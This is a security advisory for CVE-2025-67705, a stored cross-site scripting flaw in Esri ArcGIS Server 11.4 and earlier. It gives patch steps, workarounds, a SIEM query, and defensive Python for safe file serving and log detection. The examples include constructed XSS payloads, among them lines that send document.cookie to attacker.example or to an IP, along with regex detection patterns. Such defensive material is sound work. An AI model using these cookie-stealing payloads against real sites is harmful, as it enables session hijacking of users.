CVE-2025-67705

CVSS: 6.1 MEDIUM

📋 TL;DR

A stored cross-site scripting vulnerability in Esri ArcGIS Server allows attackers to upload malicious files that execute JavaScript in victims' browsers when accessed. This affects ArcGIS Server 11.4 and earlier versions on both Windows and Linux operating systems.

💻 Affected Systems

Products:
  • Esri ArcGIS Server
Versions: 11.4 and earlier
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Exploitation requires an endpoint that accepts file uploads; deployments that expose no upload capability are not affected, so check the specific configuration.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers steal session cookies, perform actions as the authenticated victim, redirect victims to attacker-controlled sites, or use the injected script as a stepping stone to deliver malware to client systems.

🟠 Likely Case

Session hijacking, credential theft, or defacement of web applications served by the vulnerable ArcGIS Server.

🟢 If Mitigated

Limited impact where uploaded content is validated and output-encoded so it cannot render as HTML in the application's origin; the underlying server-side flaw remains until the patch is applied.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires reaching an upload-capable endpoint; no authentication is needed in vulnerable configurations, but a victim must then open the uploaded file in a browser for the script to run.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: ArcGIS Server Security 2025 Update 2 Patch

Vendor Advisory: https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/arcgis-server-security-2025-update-2-patch

Restart Required: Yes

Instructions:

1. Download the ArcGIS Server Security 2025 Update 2 patch for your version and platform from Esri's support site.
2. Stop the ArcGIS Server service.
3. Apply the patch following Esri's installation instructions.
4. Start the ArcGIS Server service.
5. Verify the patch was successfully applied (see How to Verify below).

🔧 Temporary Workarounds

Disable File Upload Functionality

Applies to: all platforms

Restrict or disable file-upload capabilities in the ArcGIS Server configuration so the vulnerable upload endpoints cannot be reached; where a service genuinely needs uploads, limit them to authenticated, trusted users.

Implement Web Application Firewall Rules

Applies to: all platforms

Configure the WAF in front of ArcGIS Server to inspect multipart upload bodies and block files containing script tags, inline event handlers or other HTML/SVG markup. This only works if the WAF sees request bodies (not just URLs), and it is a stopgap rather than a substitute for the patch.

🧯 If You Can't Patch

  • Implement strict input validation and output encoding for all user-supplied content, and serve uploaded files so they cannot render as HTML in the application's origin (for example as downloads, with X-Content-Type-Options: nosniff)
  • Deploy network segmentation so ArcGIS Server is not reachable from the internet and only trusted clients can reach upload endpoints
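As an added illustration of what "output encoding" means for uploaded files specifically (this is example code, not ArcGIS Server code and not Esri's guidance): the vulnerable pattern trusts the client's filename and Content-Type and renders the stored bytes in the application's origin; the hardened pattern renders inline only verified raster images, forces everything else to download with nosniff, and flags uploads whose bytes do not match their claimed type. All filenames, MIME types and byte strings below are constructed.

```python
"""Serving uploaded files so that they cannot execute as HTML in the hosting
origin.  Added example for the stored-XSS class described on this page; it is
not ArcGIS Server code, and every filename, MIME type and byte string below
is constructed for illustration."""
import re

# Magic-byte prefixes of the only types this example is willing to render inline.
INLINE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF89a": "image/gif",
    b"GIF87a": "image/gif",
}

# Markup a browser would act on if the bytes were interpreted as HTML or SVG.
ACTIVE_MARKUP = re.compile(
    rb"(?i)<\s*(script|svg|iframe|object|embed|!doctype\s+html)\b|javascript:|\bon[a-z]+\s*="
)


def naive_headers(filename: str, declared_type: str) -> dict:
    """The vulnerable pattern: trust the client-supplied Content-Type and
    filename, and render the stored bytes inline in the application's origin."""
    return {
        "Content-Type": declared_type,
        "Content-Disposition": f'inline; filename="{filename}"',
    }


def safe_filename(filename: str) -> str:
    """Drop path components and any character that could break out of the
    Content-Disposition header (quotes, CR/LF, non-ASCII)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "_", base) or "download"


def hardened_headers(filename: str, data: bytes) -> dict:
    """Render inline only when the bytes are a verified raster image; serve
    everything else as an opaque download.  nosniff stops the browser from
    second-guessing the type, and the CSP sandbox neuters script on any
    rendering path that remains."""
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    for magic, mime in INLINE_MAGIC.items():
        if data.startswith(magic):
            headers["Content-Type"] = mime
            headers["Content-Disposition"] = "inline"
            return headers
    headers["Content-Type"] = "application/octet-stream"
    headers["Content-Disposition"] = f'attachment; filename="{safe_filename(filename)}"'
    return headers


def is_suspicious_upload(filename: str, data: bytes) -> bool:
    """Worth logging: an image extension with no image magic, or any
    non-image body that contains active markup."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    is_image = any(data.startswith(m) for m in INLINE_MAGIC)
    if ext in ("png", "jpg", "jpeg", "gif") and not is_image:
        return True
    return not is_image and ACTIVE_MARKUP.search(data[:8192]) is not None


# Constructed samples: a benign PNG header, an SVG carrying script, and an
# HTML payload hidden behind an image extension.
SAMPLES = {
    "legend.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "icon.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.cookie)</script></svg>',
    "photo.jpg": b"<html><body onload=\"fetch('//attacker.example/?c='+document.cookie)\"></body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        verdict = "SUSPICIOUS" if is_suspicious_upload(name, body) else "ok"
        print(f"{name:12} {verdict:10} {hardened_headers(name, body)['Content-Disposition']}")
```

The point of the magic-byte check is that the extension and the declared type are both attacker-controlled; only the bytes are not. A PNG with HTML appended after valid magic still comes back as image/png with nosniff set, so the browser will not treat it as a document.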

🔍 How to Verify

Check if Vulnerable:

Compare the installed ArcGIS Server version against the affected range (11.4 and earlier) and confirm whether any exposed services accept file uploads.

Check Version:

Open the ArcGIS Server Administrator Directory (https://<server>:6443/arcgis/admin by default) or ArcGIS Server Manager; the installed version is shown on the landing page.

Verify Fix Applied:

Confirm that the Security 2025 Update 2 patch is recorded as installed on the server, then submit a harmless XSS probe (for example an SVG containing a script tag) through the upload path and confirm it is rejected or no longer executes when retrieved in a browser.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file-upload activity (new source IPs, bursts of uploads, uploads outside business hours)
  • Upload requests whose body or URL contains script tags, inline event handlers (onload=, onerror=) or javascript: URIs
  • Requests for uploaded items with browser-renderable types or extensions (.html, .htm, .svg, .xml)

Network Indicators:

  • HTTP POST requests to file-upload endpoints carrying HTML/SVG/script content
  • Subsequent GET requests for the uploaded item from clients other than the uploader

SIEM Query:

source="arcgis_server" AND method="POST" AND url="*upload*" AND (content="*<script*" OR content="*javascript:*" OR content="*<svg*" OR content="*onload=*" OR content="*onerror=*")

Matching on content presumes request bodies are logged, which standard access logs do not do; a WAF or reverse proxy with body logging is needed to populate that field.
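The following added Python example (not part of the original page and not ArcGIS Server code) implements the two network indicators above over constructed JSON log lines: a POST to an upload endpoint carrying script-like content, and a later GET of an item under the same service's uploads path by a client other than the uploader. The URL layout (.../uploads/upload for the POST, .../uploads/<item> for reads) and the field names (ts, ip, method, path, body) are assumptions for the example, and the body field is only present where a WAF or proxy logs it.

```python
"""Detection logic for the two network indicators above, run over constructed
JSON access-log lines.  Added example, not part of the original page or of
ArcGIS Server; the URL layout and the field names (ts, ip, method, path,
body) are assumptions, and bodies are only present where a WAF or proxy
logs them."""
import json
import re
from datetime import datetime, timedelta

# Script-like content in an upload body or URL (case-insensitive).
XSS_MARKERS = re.compile(r"(?i)<\s*script|javascript:|<\s*svg|<\s*iframe|\bon[a-z]+\s*=")

# Assumed layout: .../<service>/uploads/upload for the POST, .../<service>/uploads/<item> for reads.
UPLOAD_PATH = re.compile(r"^(?P<prefix>.*?/uploads)/(?P<tail>[^/?]+)$")

# Constructed log lines: a hostile SVG upload, a benign zip upload, the
# attacker re-checking the item, a third party fetching it, and two unrelated requests.
LOG_LINES = r"""
{"ts":"2025-12-01T10:00:01Z","ip":"203.0.113.5","method":"POST","path":"/arcgis/rest/services/Tools/GPServer/uploads/upload","status":200,"body":"filename=\"legend.svg\"\r\n<svg onload=\"fetch('//203.0.113.5/?c='+document.cookie)\">"}
{"ts":"2025-12-01T10:00:09Z","ip":"198.51.100.7","method":"POST","path":"/arcgis/rest/services/Tools/GPServer/uploads/upload","status":200,"body":"filename=\"parcels.zip\"\r\nPK..."}
{"ts":"2025-12-01T10:30:00Z","ip":"203.0.113.5","method":"GET","path":"/arcgis/rest/services/Tools/GPServer/uploads/i2f9c1e8","status":200}
{"ts":"2025-12-01T10:45:30Z","ip":"192.0.2.44","method":"GET","path":"/arcgis/rest/services/Tools/GPServer/uploads/i2f9c1e8","status":200}
{"ts":"2025-12-01T10:46:02Z","ip":"192.0.2.44","method":"GET","path":"/arcgis/rest/services/Parcels/GPServer/uploads/i77a0b3d","status":200}
{"ts":"2025-12-01T11:00:00Z","ip":"192.0.2.44","method":"GET","path":"/arcgis/rest/services/Tools/MapServer?f=json","status":200}
"""


def parse_events(lines):
    """Yield events with the timestamp parsed, skipping blank lines."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield event


def detect(lines, window=timedelta(hours=24)):
    """Return alerts for (1) upload POSTs whose body or URL carries script
    markers and (2) later GETs of items under the same service's uploads
    path by a client other than the uploader, within `window`."""
    alerts = []
    tainted = {}  # service prefix -> [(upload time, uploader ip), ...]
    for e in parse_events(lines):
        m = UPLOAD_PATH.match(e["path"])
        if not m:
            continue
        prefix, tail = m.group("prefix"), m.group("tail")
        if e["method"] == "POST" and tail == "upload":
            if XSS_MARKERS.search(e.get("body", "")) or XSS_MARKERS.search(e["path"]):
                alerts.append({"rule": "xss_payload_in_upload", "ip": e["ip"],
                               "path": e["path"], "ts": e["ts"]})
                tainted.setdefault(prefix, []).append((e["ts"], e["ip"]))
        elif e["method"] == "GET":
            for up_ts, up_ip in tainted.get(prefix, []):
                if e["ip"] != up_ip and timedelta(0) <= e["ts"] - up_ts <= window:
                    alerts.append({"rule": "third_party_fetch_after_xss_upload",
                                   "ip": e["ip"], "path": e["path"], "ts": e["ts"],
                                   "uploader": up_ip})
                    break
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG_LINES.splitlines()):
        print(alert["ts"].isoformat(), alert["rule"], alert["ip"], alert["path"])
```

The second rule correlates at the service level rather than per item because access logs record the upload POST but not the item ID the server hands back; this makes it noisier (any client reading from a service that received a hostile upload is a candidate victim), which is why the uploader's own reads are excluded and the window is bounded.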
